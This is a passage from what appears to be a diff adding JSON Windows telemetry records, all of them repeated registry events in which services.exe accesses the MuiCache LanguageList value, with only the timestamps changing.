"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 